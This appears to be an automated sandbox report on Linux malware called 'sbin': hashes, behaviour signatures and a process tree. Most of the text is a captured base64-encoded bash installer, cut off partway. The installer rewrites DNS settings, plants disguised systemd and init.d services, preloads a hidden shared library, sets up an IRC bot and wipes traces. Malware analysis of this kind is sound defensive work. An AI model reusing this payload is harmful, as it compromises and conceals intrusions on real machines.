Resubmissions

29-09-2024 11:53

240929-n2mlkstbpq 10

26-11-2020 12:41

201126-yzw2axgdz2 9

Analysis

  • max time kernel
    593s
  • max time network
    149s
  • platform
    linux_amd64
  • resource
    ubuntu-amd64
  • submitted
    26-11-2020 12:41

General

  • Target

    sbin

  • Size

    6.9MB

  • MD5

    a2a11ec332dfd8b1b273d62f736c48a3

  • SHA1

    cf0c8bd46ff772954f6a98ec30f804e1b851be12

  • SHA256

    e52646f7cb2886d8a5d4c1a2692a5ab80926e7ce48bdb2362f383c0c6c7223a2

  • SHA512

    e749068691711391496b85bae67a5c2f1a786ca2bd0be1d636d6f52337923d49045b0979afad811f47882bbcb3c162e1303dee92995cede5bf76ec739dfbf6b7

Score
9/10

Malware Config

Signatures

  • Attempts to identify hypervisor via CPU configuration 1 TTPs 1 IoCs

    Checks CPU information for indicators that the system is a virtual machine.

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 70 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • ./sbin
    ./sbin
    1⤵
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:562
  • /proc/self/fd/3
    sbin
    1⤵
    • Attempts to identify hypervisor via CPU configuration
    • Reads CPU attributes
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:566
    • /bin/sh
      sh -c "echo IyEvYmluL2Jhc2gKCmZ1bmN0aW9uIElOSVRfTUFJTigpewpTRVRfRE5TX1NFUlZFUgpDSEVDS19TWVNURU1EClNFVF9TT19GSUxFClNFVFVQX0lSQ0JPVApDTEVBTlVQX1RSQUNFUwp9CgoKZnVuY3Rpb24gU0VUX0ROU19TRVJWRVIoKXsKaXB0YWJsZXMgLUYKY2hhdHRyIC1pYSAvZXRjLyAvZXRjL3Jlc29sdi5jb25mIDI+L2Rldi9udWxsCmNhdCAvZXRjL3Jlc29sdi5jb25mIHwgZ3JlcCAnbmFtZXNlcnZlciA4LjguOC44JyAyPi9kZXYvbnVsbCB8fCBlY2hvICduYW1lc2VydmVyIDguOC44LjgnID4+IC9ldGMvcmVzb2x2LmNvbmYKY2F0IC9ldGMvcmVzb2x2LmNvbmYgfCBncmVwICduYW1lc2VydmVyIDguOC40LjQnIDI+L2Rldi9udWxsIHx8IGVjaG8gJ25hbWVzZXJ2ZXIgOC44LjQuNCcgPj4gL2V0Yy9yZXNvbHYuY29uZgpjaGF0dHIgK2kgL2V0Yy9yZXNvbHYuY29uZiAyPi9kZXYvbnVsbAp9CgoKZnVuY3Rpb24gQ0hFQ0tfU1lTVEVNRCgpewppZiB0eXBlIHN5c3RlbWN0bCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbgpTWVNURU1EX1NFUlZJQ0UKZWxzZQpJTklURF9TRVJWSUNFCmZpCn0KCgpmdW5jdGlvbiBTWVNURU1EX1NFUlZJQ0UoKXsKaWYgWyAhIC1mICIvbGliL3N5c3RlbWQvc3lzdGVtL05ldHdvcmtNYW5hZ2VyLXdhaXQuc2VydmljZSIgXTsgdGhlbgpjaGF0dHIgLWlhIC9saWIvIC9saWIvc3lzdGVtZC8gL2xpYi9zeXN0ZW1kL3N5c3RlbS8gMj4vZGV2L251bGwKbWtkaXIgLXAgL2xpYi9zeXN0ZW1kL3N5c3RlbS8gMj4vZGV2L251bGwKaWYgISB0eXBlIG5pY2UgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4KZXhwb3J0IFNZU1RFTURTUlY9J1cxVnVhWFJkQ2tSbGMyTnlhWEIwYVc5dVBVNWxkSGR2Y210TllXNWhaMlZ5TFhkaGFYUUtDbHRUWlhKMmFXTmxYUXBGZUdWalUzUmhjblE5TDJKcGJpOXpZbWx1Q2xOMFlXNWtZWEprVDNWMGNIVjBQVzUxYkd3S0NsdEpibk4wWVd4c1hRcFhZVzUwWldSQ2VUMXRkV3gwYVMxMWMyVnlMblJoY21kbGRBcEJiR2xoY3oxT1pYUjNiM0pyVFdGdVlXZGxjaTEzWVdsMExuTmxjblpwWTJVSycKZWxzZQpleHBvcnQgU1lTVEVNRFNSVj0nVzFWdWFYUmRDa1JsYzJOeWFYQjBhVzl1UFU1bGRIZHZjbXROWVc1aFoyVnlMWGRoYVhRS0NsdFRaWEoyYVdObFhRcEZlR1ZqVTNSaGNuUTlibWxqWlNBdGJpQXRNakFnTDJKcGJpOXpZbWx1Q2xOMFlXNWtZWEprVDNWMGNIVjBQVzUxYkd3S0NsdEpibk4wWVd4c1hRcFhZVzUwWldSQ2VUMXRkV3gwYVMxMWMyVnlMblJoY21kbGRBcEJiR2xoY3oxT1pYUjNiM0pyVFdGdVlXZGxjaTEzWVdsMExuTmxjblpwWTJVSycKZmkKZWNobyAkU1lTVEVNRFNSViB8IGJhc2U2NCAtZCA+IC9saWIvc3lzdGVtZC9zeXN0ZW0vTmV0d29ya01hbmFnZXItd2FpdC5zZXJ2aWNlCmZpCnN5c3RlbWN0bCAtLXN5c3RlbSBkYWVtb24tcmVsb2FkIDI+L2Rldi9udWxsCnN5c3RlbWN0bCBlbmFibGUgTmV0d29ya01hbmFnZXItd2FpdC5zZXJ2aWNlIDI+L2Rldi9udWxsCnN5c3RlbWN0bCBzdGFydCBOZXR3b3JrTWFuYWdlci13YWl0LnNlcnZpY2UgMj4vZGV2L251bGwKfQoKCmZ1bmN0aW9uIElOSVREX1NFUlZJQ0UoKXsKaWYgWyAhIC1mICIvZXRjL2luaXQuZC9uZXR3b3JrcyIgXTsgdGhlbgpjaGF0dHIgLWlhIC9ldGMvIC9ldGMvaW5pdC5kLyAyPi9kZXYvbnVsCmlmICEgdHlwZSBuaWNlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuCmV4cG9ydCBJTklURFNSVj0nSXlNaklFSkZSMGxPSUVsT1NWUWdTVTVHVHdvaklGQnliM1pwWkdWek9pQWdJQ0FnSUNBZ0lDQk9aWFIzYjNKclRXRnVZV2RsY2kxM1lXbDBDaU1nVW1WeGRXbHlaV1F0VTNSaGNuUTZJQ0FnSUNSdVpYUjNiM0pyQ2lNZ1VtVnhkV2x5WldRdFUzUnZjRG9nSUNBZ0lDUnVaWFIzYjNKcklDUnNiMk5oYkY5bWN5QWtibUZ0WldRZ0pIQnZjblJ0WVhBZ0pISmxiVzkwWlY5bWN5QWtjM2x6Ykc5bklDUjBhVzFsQ2lNZ1UyaHZkV3hrTFZOMFlYSjBPaUFnSUNBZ0lDUnVaWFIzYjNKcklBa2dDaU1nUkdWbVlYVnNkQzFUZEdGeWREb2dJQ0FnSURJZ015QTBJRFVLSXlCRVpXWmhkV3gwTFZOMGIzQTZJQ0FnSUNBZ01DQXhJRFlLSXlCVGFHOXlkQzFFWlhOamNtbHdkR2x2YmpvZ1RHbHVkWGdnVG1WMGQyOXlhMDFoYm1GblpYSXRkMkZwZEFvaklFUmxjMk55YVhCMGFXOXVPaUFnSUNBZ0lDQk1hVzUxZUNCT1pYUjNiM0pyVFdGdVlXZGxjaTEzWVdsMENpTWpJeUJGVGtRZ1NVNUpWQ0JKVGtaUENncGthWEk5SWk5aWFXNGlDbU50WkQwaUwySnBiaTl6WW1sdUlncDFjMlZ5UFNKeWIyOTBJZ29LYm1GdFpUMWdZbUZ6Wlc1aGJXVWdKREJnQ25CcFpGOW1hV3hsUFNJdlltbHVMeVJ1WVcxbExuQnBaQ0lLYzNSa2IzVjBYMnh2WnowaUwySnBiaThrYm1GdFpTNXNiMmNpQ25OMFpHVnljbDlzYjJjOUlpOWlhVzR2Skc1aGJXVXVaWEp5SWdvS1oyVjBYM0JwWkNncElIc0tJQ0FnSUdOaGRDQWlKSEJwWkY5bWFXeGxJZ3A5Q2dwcGMxOXlkVzV1YVc1bktDa2dld29nSUNBZ1d5QXRaaUFpSkhCcFpGOW1hV3hsSWlCZElDWW1JSEJ6SUMxd0lHQm5aWFJmY0dsa1lDQStJQzlrWlhZdmJuVnNiQ0F5UGlZeENuMEtDbU5oYzJVZ0lpUXhJaUJwYmdvZ0lDQWdjM1JoY25RcENpQWdJQ0JwWmlCcGMxOXlkVzV1YVc1bk95QjBhR1Z1Q2lBZ0lDQWdJQ0FnWldOb2J5QWlRV3h5WldGa2VTQnpkR0Z5ZEdWa0lnb2dJQ0FnWld4elpRb2dJQ0FnSUNBZ0lHVmphRzhnSWxOMFlYSjBhVzVuSUNSdVlXMWxJZ29nSUNBZ0lDQWdJR05rSUNJa1pHbHlJZ29nSUNBZ0lDQWdJR2xtSUZzZ0xYb2dJaVIxYzJWeUlpQmRPeUIwYUdWdUNpQWdJQ0FnSUNBZ0lDQWdJSE4xWkc4Z0pHTnRaQ0ErUGlBaUpITjBaRzkxZEY5c2IyY2lJREkrUGlBaUpITjBaR1Z5Y2w5c2IyY2lJQ1lLSUNBZ0lDQWdJQ0JsYkhObENpQWdJQ0FnSUNBZ0lDQWdJSE4xWkc4Z0xYVWdJaVIxYzJWeUlpQWtZMjFrSUQ0K0lDSWtjM1JrYjNWMFgyeHZaeUlnTWo0K0lDSWtjM1JrWlhKeVgyeHZaeUlnSmdvZ0lDQWdJQ0FnSUdacENpQWdJQ0FnSUNBZ1pXTm9ieUFrSVNBK0lDSWtjR2xrWDJacGJHVWlDaUFnSUNBZ0lDQWdhV1lnSVNCcGMxOXlkVzV1YVc1bk95QjBhR1Z1Q2lBZ0lDQWdJQ0FnSUNBZ0lHVmphRzhnSWxWdVlXSnNaU0IwYnlCemRHRnlkQ3dnYzJWbElDUnpkR1J2ZFhSZmJHOW5JR0Z1WkNBa2MzUmtaWEp5WDJ4dlp5SUtJQ0FnSUNBZ0lDQWdJQ0FnWlhocGRDQXhDaUFnSUNBZ0lDQWdabWtLSUNBZ0lHWnBDaUFnSUNBN093b2dJQ0FnYzNSdmNDa0tJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNCbFkyaHZJQzF1SUNKVGRHOXdjR2x1WnlBa2JtRnRaUzR1SWdvZ0lDQWdJQ0FnSUd0cGJHd2dZR2RsZEY5d2FXUmdDaUFnSUNBZ0lDQWdabTl5SUdrZ2FXNGdNU0F5SURNZ05DQTFJRFlnTnlBNElEa2dNVEFLSUNBZ0lDQWdJQ0FqSUdadmNpQnBJR2x1SUdCelpYRWdNVEJnQ2lBZ0lDQWdJQ0FnWkc4S0lDQWdJQ0FnSUNBZ0lDQWdhV1lnSVNCcGMxOXlkVzV1YVc1bk95QjBhR1Z1Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JpY21WaGF3b2dJQ0FnSUNBZ0lDQWdJQ0JtYVFvS0lDQWdJQ0FnSUNBZ0lDQWdaV05vYnlBdGJpQWlMaUlLSUNBZ0lDQWdJQ0FnSUNBZ2MyeGxaWEFnTVFvZ0lDQWdJQ0FnSUdSdmJtVUtJQ0FnSUNBZ0lDQmxZMmh2Q2dvZ0lDQWdJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNBZ0lDQWdaV05vYnlBaVRtOTBJSE4wYjNCd1pXUTdJRzFoZVNCemRHbHNiQ0JpWlNCemFIVjBkR2x1WnlCa2IzZHVJRzl5SUhOb2RYUmtiM2R1SUcxaGVTQm9ZWFpsSUdaaGFXeGxaQ0lLSUNBZ0lDQWdJQ0FnSUNBZ1pYaHBkQ0F4Q2lBZ0lDQWdJQ0FnWld4elpRb2dJQ0FnSUNBZ0lDQWdJQ0JsWTJodklDSlRkRzl3Y0dWa0lnb2dJQ0FnSUNBZ0lDQWdJQ0JwWmlCYklDMW1JQ0lrY0dsa1gyWnBiR1VpSUYwN0lIUm9aVzRLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSEp0SUNJa2NHbGtYMlpwYkdVaUNpQWdJQ0FnSUNBZ0lDQWdJR1pwQ2lBZ0lDQWdJQ0FnWm1rS0lDQWdJR1ZzYzJVS0lDQWdJQ0FnSUNCbFkyaHZJQ0pPYjNRZ2NuVnVibWx1WnlJS0lDQWdJR1pwQ2lBZ0lDQTdPd29nSUNBZ2NtVnpkR0Z5ZENrS0lDQWdJQ1F3SUhOMGIzQUtJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNCbFkyaHZJQ0pWYm1GaWJHVWdkRzhnYzNSdmNDd2dkMmxzYkNCdWIzUWdZWFIwWlcxd2RDQjBieUJ6ZEdGeWRDSUtJQ0FnSUNBZ0lDQmxlR2wwSURFS0lDQWdJR1pwQ2lBZ0lDQWtNQ0J6ZEdGeWRBb2dJQ0FnT3pzS0lDQWdJSE4wWVhSMWN5a0tJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNCbFkyaHZJQ0pTZFc1dWFXNW5JZ29nSUNBZ1pXeHpaUW9nSUNBZ0lDQWdJR1ZqYUc4Z0lsTjBiM0J3WldRaUNpQWdJQ0FnSUNBZ1pYaHBkQ0F4Q2lBZ0lDQm1hUW9nSUNBZ096c0tJQ0FnSUNvcENpQWdJQ0JsWTJodklDSlZjMkZuWlRvZ0pEQWdlM04wWVhKMGZITjBiM0I4Y21WemRHRnlkSHh6ZEdGMGRYTjlJZ29nSUNBZ1pYaHBkQ0F4Q2lBZ0lDQTdPd3BsYzJGakNncGxlR2wwSURBS0NnPT0nCmVsc2UKZXhwb3J0IElOSVREU1JWPSdJeU1qSUVKRlIwbE9JRWxPU1ZRZ1NVNUdUd29qSUZCeWIzWnBaR1Z6T2lBZ0lDQWdJQ0FnSUNCT1pYUjNiM0pyVFdGdVlXZGxjaTEzWVdsMENpTWdVbVZ4ZFdseVpXUXRVM1JoY25RNklDQWdJQ1J1WlhSM2IzSnJDaU1nVW1WeGRXbHlaV1F0VTNSdmNEb2dJQ0FnSUNSdVpYUjNiM0pySUNSc2IyTmhiRjltY3lBa2JtRnRaV1FnSkhCdmNuUnRZWEFnSkhKbGJXOTBaVjltY3lBa2MzbHpiRzluSUNSMGFXMWxDaU1nVTJodmRXeGtMVk4wWVhKME9pQWdJQ0FnSUNSdVpYUjNiM0pySUFrZ0NpTWdSR1ZtWVhWc2RDMVRkR0Z5ZERvZ0lDQWdJRElnTXlBMElEVUtJeUJFWldaaGRXeDBMVk4wYjNBNklDQWdJQ0FnTUNBeElEWUtJeUJUYUc5eWRDMUVaWE5qY21sd2RHbHZiam9nVEdsdWRYZ2dUbVYwZDI5eWEwMWhibUZuWlhJdGQyRnBkQW9qSUVSbGMyTnlhWEIwYVc5dU9pQWdJQ0FnSUNCTWFXNTFlQ0JPWlhSM2IzSnJUV0Z1WVdkbGNpMTNZV2wwQ2lNakl5QkZUa1FnU1U1SlZDQkpUa1pQQ2dwa2FYSTlJaTlpYVc0aUNtTnRaRDBpYm1salpTQXRiaUF0TWpBZ0wySnBiaTl6WW1sdUlncDFjMlZ5UFNKeWIyOTBJZ29LYm1GdFpUMWdZbUZ6Wlc1aGJXVWdKREJnQ25CcFpGOW1hV3hsUFNJdlltbHVMeVJ1WVcxbExuQnBaQ0lLYzNSa2IzVjBYMnh2WnowaUwySnBiaThrYm1GdFpTNXNiMmNpQ25OMFpHVnljbDlzYjJjOUlpOWlhVzR2Skc1aGJXVXVaWEp5SWdvS1oyVjBYM0JwWkNncElIc0tJQ0FnSUdOaGRDQWlKSEJwWkY5bWFXeGxJZ3A5Q2dwcGMxOXlkVzV1YVc1bktDa2dld29nSUNBZ1d5QXRaaUFpSkhCcFpGOW1hV3hsSWlCZElDWW1JSEJ6SUMxd0lHQm5aWFJmY0dsa1lDQStJQzlrWlhZdmJuVnNiQ0F5UGlZeENuMEtDbU5oYzJVZ0lpUXhJaUJwYmdvZ0lDQWdjM1JoY25RcENpQWdJQ0JwWmlCcGMxOXlkVzV1YVc1bk95QjBhR1Z1Q2lBZ0lDQWdJQ0FnWldOb2J5QWlRV3h5WldGa2VTQnpkR0Z5ZEdWa0lnb2dJQ0FnWld4elpRb2dJQ0FnSUNBZ0lHVmphRzhnSWxOMFlYSjBhVzVuSUNSdVlXMWxJZ29nSUNBZ0lDQWdJR05rSUNJa1pHbHlJZ29nSUNBZ0lDQWdJR2xtSUZzZ0xYb2dJaVIxYzJWeUlpQmRPeUIwYUdWdUNpQWdJQ0FnSUNBZ0lDQWdJSE4xWkc4Z0pHTnRaQ0ErUGlBaUpITjBaRzkxZEY5c2IyY2lJREkrUGlBaUpITjBaR1Z5Y2w5c2IyY2lJQ1lLSUNBZ0lDQWdJQ0JsYkhObENpQWdJQ0FnSUNBZ0lDQWdJSE4xWkc4Z0xYVWdJaVIxYzJWeUlpQWtZMjFrSUQ0K0lDSWtjM1JrYjNWMFgyeHZaeUlnTWo0K0lDSWtjM1JrWlhKeVgyeHZaeUlnSmdvZ0lDQWdJQ0FnSUdacENpQWdJQ0FnSUNBZ1pXTm9ieUFrSVNBK0lDSWtjR2xrWDJacGJHVWlDaUFnSUNBZ0lDQWdhV1lnSVNCcGMxOXlkVzV1YVc1bk95QjBhR1Z1Q2lBZ0lDQWdJQ0FnSUNBZ0lHVmphRzhnSWxWdVlXSnNaU0IwYnlCemRHRnlkQ3dnYzJWbElDUnpkR1J2ZFhSZmJHOW5JR0Z1WkNBa2MzUmtaWEp5WDJ4dlp5SUtJQ0FnSUNBZ0lDQWdJQ0FnWlhocGRDQXhDaUFnSUNBZ0lDQWdabWtLSUNBZ0lHWnBDaUFnSUNBN093b2dJQ0FnYzNSdmNDa0tJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNCbFkyaHZJQzF1SUNKVGRHOXdjR2x1WnlBa2JtRnRaUzR1SWdvZ0lDQWdJQ0FnSUd0cGJHd2dZR2RsZEY5d2FXUmdDaUFnSUNBZ0lDQWdabTl5SUdrZ2FXNGdNU0F5SURNZ05DQTFJRFlnTnlBNElEa2dNVEFLSUNBZ0lDQWdJQ0FqSUdadmNpQnBJR2x1SUdCelpYRWdNVEJnQ2lBZ0lDQWdJQ0FnWkc4S0lDQWdJQ0FnSUNBZ0lDQWdhV1lnSVNCcGMxOXlkVzV1YVc1bk95QjBhR1Z1Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JpY21WaGF3b2dJQ0FnSUNBZ0lDQWdJQ0JtYVFvS0lDQWdJQ0FnSUNBZ0lDQWdaV05vYnlBdGJpQWlMaUlLSUNBZ0lDQWdJQ0FnSUNBZ2MyeGxaWEFnTVFvZ0lDQWdJQ0FnSUdSdmJtVUtJQ0FnSUNBZ0lDQmxZMmh2Q2dvZ0lDQWdJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNBZ0lDQWdaV05vYnlBaVRtOTBJSE4wYjNCd1pXUTdJRzFoZVNCemRHbHNiQ0JpWlNCemFIVjBkR2x1WnlCa2IzZHVJRzl5SUhOb2RYUmtiM2R1SUcxaGVTQm9ZWFpsSUdaaGFXeGxaQ0lLSUNBZ0lDQWdJQ0FnSUNBZ1pYaHBkQ0F4Q2lBZ0lDQWdJQ0FnWld4elpRb2dJQ0FnSUNBZ0lDQWdJQ0JsWTJodklDSlRkRzl3Y0dWa0lnb2dJQ0FnSUNBZ0lDQWdJQ0JwWmlCYklDMW1JQ0lrY0dsa1gyWnBiR1VpSUYwN0lIUm9aVzRLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSEp0SUNJa2NHbGtYMlpwYkdVaUNpQWdJQ0FnSUNBZ0lDQWdJR1pwQ2lBZ0lDQWdJQ0FnWm1rS0lDQWdJR1ZzYzJVS0lDQWdJQ0FnSUNCbFkyaHZJQ0pPYjNRZ2NuVnVibWx1WnlJS0lDQWdJR1pwQ2lBZ0lDQTdPd29nSUNBZ2NtVnpkR0Z5ZENrS0lDQWdJQ1F3SUhOMGIzQUtJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNCbFkyaHZJQ0pWYm1GaWJHVWdkRzhnYzNSdmNDd2dkMmxzYkNCdWIzUWdZWFIwWlcxd2RDQjBieUJ6ZEdGeWRDSUtJQ0FnSUNBZ0lDQmxlR2wwSURFS0lDQWdJR1pwQ2lBZ0lDQWtNQ0J6ZEdGeWRBb2dJQ0FnT3pzS0lDQWdJSE4wWVhSMWN5a0tJQ0FnSUdsbUlHbHpYM0oxYm01cGJtYzdJSFJvWlc0S0lDQWdJQ0FnSUNCbFkyaHZJQ0pTZFc1dWFXNW5JZ29nSUNBZ1pXeHpaUW9nSUNBZ0lDQWdJR1ZqYUc4Z0lsTjBiM0J3WldRaUNpQWdJQ0FnSUNBZ1pYaHBkQ0F4Q2lBZ0lDQm1hUW9nSUNBZ096c0tJQ0FnSUNvcENpQWdJQ0JsWTJodklDSlZjMkZuWlRvZ0pEQWdlM04wWVhKMGZITjBiM0I4Y21WemRHRnlkSHh6ZEdGMGRYTjlJZ29nSUNBZ1pYaHBkQ0F4Q2lBZ0lDQTdPd3BsYzJGakNncGxlR2wwSURBS0NnPT0nCmZpCmVjaG8gJElOSVREU1JWIHwgYmFzZTY0IC1kID4gL2V0Yy9pbml0LmQvbmV0d29ya3MKZmkKY2htb2QgK3ggL2V0Yy9pbml0LmQvbmV0d29ya3MgMj4vZGV2L251bAp1cGRhdGUtcmMuZCBuZXR3b3JrcyBkZWZhdWx0cyAyPi9kZXYvbnVsIHx8ICBjaGtjb25maWcgbmV0d29ya3Mgb24gMj4vZGV2L251bApzZXJ2aWNlIG5ldHdvcmtzIGluc3RhbGwgMj4vZGV2L251bApzZXJ2aWNlIG5ldHdvcmtzIHN0YXJ0IDI+L2Rldi9udWwKL2V0Yy9pbml0LmQvbmV0d29ya3Mgc3RhcnQgMj4vZGV2L251bAp9CgoKZnVuY3Rpb24gU0VUX1NPX0ZJTEUoKXsKaWYgWyAhIC1mICIvdXNyL2xvY2FsL2xpYi9zeXN0ZW1oZWFsdC5zbyIgXTsgdGhlbgpjaGF0dHIgLWlhIC91c3IvIC91c3IvbG9jYWwvIC91c3IvbG9jYWwvbGliLyAvZXRjLyAvZXRjL2xkLnNvLnByZWxvYWQgMj4vZGV2L251bGwKU09GSUxFPSdINHNJQUFBQUFBQUFBKzFiRFd3Y3hSV2VPLy9FanAzWUlZU2tKQ1ZIaEt1RUpHZkhqbU03cWVFU3g4Nm1Ta0lJY2NWUHplWjhQNzRyOTZmZE5kaEFxTUVFWXF5ckxDcXF0RldycUZKcDJrb29LaW9LVUtnaGtKUzJvZ1pSaUNnVkppWFZYWURXS1Q5MUZlUHR2Tm1admRtNTNWQWhwVkxiZmRiZTIvZk5lMjltM3M2Y1oyN25xWU9xRmtuR0lzR0U1bGZUNktKUUE2YVc1bWJDTVFsOC9UcTRYOWZVMHJ4aFhXTmpZMHNMYWxqWHVMNmxDZmthTGs1enJOU3Zha0hGNTBOS09xMWRTTyt6eXY5TDZSdWRPN3E4SG84cGw2QnJFRWkxQ3d3NXdBbzJGV3dDcUJWVjRzOWxhQ25STGIyQS85b0tLMGUxQmdPN01rNFdlYmJNeW5rN1VwK1A0Z0kvNkxGeTNxNGNYOU5yRFhtNjNjb1BlUTErMUd1MTgxSzdDcjhoVjF4ajVSTWVLMmZkTEtWWEsvVW44cXVRbGJNWTdqNmpoZUUrUnZzajhpOGpLMmQyMTJPN2N2VHZFd3YzSGxxZlUxd3F2RmJPd2dvMmx5SVlMd2h0MjlXTmFwWldmMUQ2MGoySjA3ZTFEL3FIei9UODZQU1pwYUFIWmd0UklmNWtiSlVhR05EVkUrK3M4SXo4c2YxQzdmVFo0R0Y4WFdLRFAraUFhdzc0TFE1NDBnRy8xd0YvMFFIdmRzQ2ZjY0FoUGo0Yi9Kc08rbmM1NEdzYy9CeHgwTy9DMXdvYi9ERUgvU2Z3dGNBRy93SFJyMFlKK29DcjZJRDVIY1h2dU5TS0kxbnVTNlpUTW53TGE3S001TzE3ZDhyaGlCTHBpK04vVE1yZW5SMkpkQ3F5TjlpYmlCaGw5aVZ5YUNBb1IrT3BZQ0orWndTRjQwbzBqTlJVUm9tbnRDaFNJc0Z3SXA2NkRhbWFvbVpTd0JLUkZJcW1NL0RaRjlGVUZBMGwwaXI0aWF2cFVGdWJyS3FoWU1xd3hNNDJyRWZoaERxWXhKOFJSVWtyMkFOdW9vS2l0QUxzTUpUTU1HMlVpUGVHRS9pL3FiOFJia053dHdGdDI3RjlTNGZjNkcvME41djNMVVlJdkVWL01LL2dzeFIvd3VVeDV4M2N2WVlLODZMLzhuZ2w2T1hOY2k5Nkd4WG05K0o0ZkI1NCs1aGlocjdYMURmbk9aWEgyVU85eG9vUFVYd29JT0JVUGlqZ2JQQ2R1dGJnYk80em11VHdLZzdQY2ZoOERwL2k4Rm9Pbitad2Zwd3VvZTJaZzR6dklMTlpIRjdDNFNzNW5QOS8xc0RoWlJ6ZXl1SDg5MjZBdytkd3VNVGhGUnkrbThNck9meEdEcC9MNGZzNHZKckRZeHcrajhNekhGN0Q0UU1jYmplUFhYTEpKWmRjY3NtbC8xMlNodCt2a0ViTC9sQ1BidytNYTE1OVFocCtvZUs0V2E0M244WkZldDI3K0xObWVRRGZnUnlEb3Z5a2pxbnVUWkJoYVplZklQS3JJTU9TS3o5TzVOK0FERXV0L0ZFaVB3OHlMTEh5aDRuOEZNaXd0TXFQRWZubklNT1NLajlFNUorQ0RNdVVmSWJJUHdRWmxsRDVmVVQrTHNpd2RNcnZKdkxESU1PU0tSOGc4a01nd3hJejMwRGsrMENHcFZQZVIrU3plR2NmSFRQamtXMGZoRmhreXhSZ2JkUGFJaHlleC94R2VDcjF5WnJsUTZCM25IS3N2NTNvTjI4QnRtcFdHcG1TbnZ2cnRkSnoweVdTNTRUMHlxeDJLWGF3bnpxbzBDZWpOY3UzRnV5SDJpdXhIZXF2NzVhRzIyK0ZIeG1ra1ROYXRUVGFmaG9MdVI3Y3dsd01mNXdvZXdmTG5wN2pRdjM1dTNCaE43YkJEeklqamV3L0lvMzBINVpHdWc5Sm81MzQvbVR1NlZsZEgrbWNHZDQvby9mUE9RWW03OTA2MmowalpUdVBqcndpWlJmQkt2dlpBS24zSkNuT2JjY1cwaWg0MkhrWTFLU1JsOEdSRitDUnppbHBlUCtVNldvaFZwekNWUjJXUEJNbkVEb0c0K0NsNDlDZUc2UjczMi8xZ050bmZrMHNmekZPL0I0Z1VyYjVPL05JbGJuM1BvWEM0NndBSTA4QzBuWmNtMHVxeVA4UzJqYjZpR0YyWUpJb1FjTkQyTUd6eU1NMWZPelRna3EyK1hwYXdWbFNRV2NPdHp1SFdMdS9qdHVkbzdyTVNTNERtZ2ZHKzNHbnNEb0dsbVBBME4vSW9HclFHYzJTdm1RZmVXdVdyL0dkYXE0eEliQ0ZjRWozdmdCeHVLV0hoQVZIeGVjbFVja1JUMlVMMTVLUjBiOERPL2daT0RoNUVvWmxyb00wdSt5ak5kRDdzZy9XR0ZwZnltMGkrUE1ZYXlORk1QVDI4eFcvT1FOK0Z6MU5TZytRV2taTzZxL2lFRXpqRUV3ajdXNHBtNTBpbFpQU3A0enVrMmY4T0pieEtMMFo5NGxvWkpzM0dLNXo0UmtvNlEvZ09FeEwyZDBMUVlNOGloUFN5QnU1cWxsaXR3TFgyd1Qxc3NMWHdYU1ZZVnFXaitKK2pZR0RsK3hEVWJ1bUVJb1hxZ3FoYUowaG9UaTNtb1RpN0dvV2lvWVpGZ3IvYWhZS3BZb0x4ZS9QazFBY1cvMDVRbkZrUmd6RmFzTjE3cWJ6RndvRit0UU14Y3JWWWlpdU9GOGNDdm9kYlBuV2Rja2xsMXh5eVNXWFhITEpwWXREYW04OGhlb3pTanBVcjBZUzBmcG91TDR1RENjd210WTNiMmhwYmFObGRXcTlxZ1UxcEtDNnNHOWwzUzIzcnVwUnViZGpuZkJXekJkUCtjaHJzbzIrT25XdVlXaStFL01zTGRrRTc2eGhZMy9zYjdwK0krYUhwblI5Q1BPZWM3cCtDUE1QemhuYnJkSVBkZjB0ekdzKzB2VVoyazc2MmhCNTd0eURQQU8xbnFYVmN5ckdQTWI3ODJYNHVoSDduQVNGK2JWZDg1ZDhwYWJxam9vaGRPM2xtNjV1dW1vRnM4ZmJibFNMNitUZnY0RHQxL0QxRE1iSmp3Q2I1OWMrNE8yWVYrNGR4VFVZcjdIdXh0ZGEzTGJGSHE1Y0dpNHBtZXNoT3VEak1MNThmOWYxS2w2bnBKd29RUGs0dnFvK3RDOTN5U1dYWEhMSkpaZGNjc2tsbDF5Nm1NVE8rYkZ6ZmV4czNtdklLcjlOdVhuV2pCNitZMmZNN2w5azhDOVFtWjBuWEVwbHRydTVuTm5UYzRYTGhQS1BaM1dTZmJDUEh0WmpaKzJHNkdFOGRzYnVJQzFuWitKMHl0a1p3aVdVbTJmN0FnWmpad0JiYWNmWWZwS2QwVnRNK2FseUs4NHFadTA4UlRrN3E4ZnFtOVdOOWgrbERkZXB6T3Fkb3ZJUUxmOG5sUzkwZHY0L1Fld2N1MGdiNkhQdW92eXJsRWNwdjUzeUJ5ai9OdVdQVXY0RTVTY29mNTN5djFEK0NlWHMvQ2c3TDdxdG8yT2piK1hXU0c4OG1QSzErWnY4RFd2WE5hOHk3ajZyTHlWNDFMWjY3WEN2T2E2c2VJazVucXg0cVRudXJIaVorZnlzZUxuNTNLMzRIT3ZoVUJPdk1NZVpGYSswSG00MThibklaNHRYMlI3ZUxNR3p0ZFlXbjJmT1Z5c